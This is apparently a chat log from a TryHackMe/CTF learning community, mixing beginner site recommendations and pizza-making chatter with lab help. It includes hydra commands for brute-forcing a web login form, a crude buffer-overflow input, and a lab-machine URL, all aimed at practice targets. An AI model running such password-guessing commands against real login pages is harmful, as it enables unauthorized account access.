http://10.10.65.82:8000/kibana-log.txt

#

python3 -c "'A' *100"| ./access-check

merry fog
#

Hi, anyone played pwnadventure3 ?

remote ledge
#

no

supple trellis
royal gust
#

Hmmm

#

Pizza dough, check.

#

pizza sauce, check

#

need to give the dough 30 mins to rest. and i will begin preheat

royal gust
#

being the lazy person .. its juts a plain old pepperonni pizza...

#

this ones a thick crust though

warm atlas
#

i am having a online lesson now lmao

supple trellis
#

calls the cops ๐Ÿ‘€

autumn quest
#

@paper steppe

formal garnet
#

@plucky vault what are u trying to bruteforce?

plucky vault
#

website.

formal garnet
#

means like with any username?

#

or u r giving a uname?

plucky vault
#

Sorry what?

formal garnet
#

like what usernames are u trying/

#

means if i try to do it with my username will it do it (if my pass is in it)

plucky vault
#

Molly, molly, Elf Molly, elf molly.

#

As according to the THM page.

formal garnet
#

o

plucky vault
#

I'm so confused why I'm not getting the right password.

formal garnet
#

bro im beginer and have to do a lot

#

hey can u tell me some good ctf sites for beginers? pls

ashen prism
#

overthewire , underthewire , PicoCTF

formal garnet
#

are they like for beginers?

ashen prism
#

Yes they are for beginners

formal garnet
#

ok th

#

any chalanges like root that and get flag types?

#

@ashen prism

ashen prism
#

overthewire and underwire are not like those flag types CTF's they are like wargames where you have to just find the password however PicoCTF is like flag type

formal garnet
#

no i mean like we have to root the macihne and get the flag

ashen prism
#

No I don't think they are like those kind of challenges they are just for learning the tools and the basic level stuff for rooting the machine type of challenges TryHackMe and vulnhub is the best so far .There is HackTheBox too but that's for intermediate level so if you have already started with TryHackMe then stick with it

formal garnet
#

vulnhub i will have to root the machine right??

ashen prism
#

Yeeah

formal garnet
#

and any site for like a machine has a webserver and we hv to get in it and get flags from ssh

#

sry for troubling...but im real beginer so asking u abt it skidy

ashen prism
#

Yes for that there is TryHackMe of course , vulnhub and HackTheBox

#

Oh no worries man I am not that kind of a elite my self xD

formal garnet
#

cause other guys just start shouting

plucky vault
#

hydra -l molly -P ./password.txt thm http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:Your username or password is incorrect." -V -I

frank sequoia
#

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

weak yew
supple trellis
#

@plucky vault do a post request

plucky vault
#

Don't give me the answer.

supple trellis
#

don't do a post request ๐Ÿคทโ€โ™‚๏ธ

plucky vault
#

All I'm asking is to not give me the answer.

#

What?

ashen prism
#

cause other guys just start shouting
@formal garnet I'm happy to help man feel free to DM me whenever you want

formal garnet
#

man im not able to do the thm lion koth

ashen prism
#

Lion , I haven't done it but I'll try to do ,the boxes that I have done in KoTH are shrek , offline , that kung fu panda one and space jam

formal garnet
#

ur subscribed??

ashen prism
#

Yes

keen mulch
tame ether
#

Dark in vc

#

Oof not anymore

keen mulch
plucky vault
remote ledge
#

Hail Hydra

#

the end of the function is before popq instruction

plucky vault
random flower
#

yeah

plucky vault
#

Ah!

worldly minnow
#

what cant you do? @royal gust

#

magic mushrooms

#

@royal gust :
if he wants it
he studies it
and gets it done

me:
i want it
i study it
i cry

royal gust
#

@worldly minnow : look up a song called uhh .. eraser

#

You practically wrote the lyrics just now ๐Ÿ˜‰

remote ledge
#

puzzels

#

๐Ÿคฎ

dark igloo
#

what is this ?

remote ledge
#

idk

#

solving some puzzels

royal gust
#

I think they were getting curb stomped by the puzzles ๐Ÿ˜‰

royal gust
dark igloo
#

thx

royal gust
#

echo %USERNAME%

twilit wigeon
#

Tรผrk var mฤฑ

royal gust
dark igloo
royal gust
#

@mental knoll kazam (1) - Screen recording and capturing program.

#

sporked@livid nymph:~/thm$ apropos screen | grep -i record

#

ps auxfr

#

ps auxf

#

root 1 0.0 0.0 169248 11652 ? Ss Oct22 0:48 /sbin/init splash

#

sporked@kali:/etc/init.d$ cat ntp
#!/bin/sh

BEGIN INIT INFO

Provides: ntp

Required-Start: $network $remote_fs $syslog

Required-Stop: $network $remote_fs $syslog

Default-Start: 2 3 4 5

Default-Stop:

Short-Description: Start NTP daemon

END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

. /lib/lsb/init-functions

zenith cradle
#

@royal gust why doesn't WSL run init?

royal gust
#

I was asking if he was runing WSL